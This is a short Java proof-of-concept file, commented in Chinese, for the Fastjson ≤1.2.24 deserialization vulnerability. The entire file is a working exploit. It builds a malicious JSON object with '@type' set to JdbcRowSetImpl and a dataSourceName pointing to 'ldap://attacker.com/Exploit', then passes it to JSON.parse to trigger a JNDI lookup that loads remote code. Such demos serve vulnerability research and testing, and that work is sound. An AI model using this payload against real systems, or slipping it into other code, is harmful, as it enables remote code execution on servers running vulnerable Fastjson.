package demo;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.ParserConfig;

public class FastjsonPoc {
    public static void main(String[] args) {
        // 模拟攻击者构造的恶意 JSON（Fastjson ≤ 1.2.24）
        String maliciousJson = "{\n" +
                "  \"@type\": \"com.sun.rowset.JdbcRowSetImpl\",\n" +
                "  \"dataSourceName\": \"ldap://attacker.com/Exploit\",\n" +
                "  \"autoCommit\": true\n" +
                "}";

        // 反序列化触发漏洞（需目标开启 autotype）
        Object obj = JSON.parse(maliciousJson);
        System.out.println("反序列化完成: " + obj);
    }
}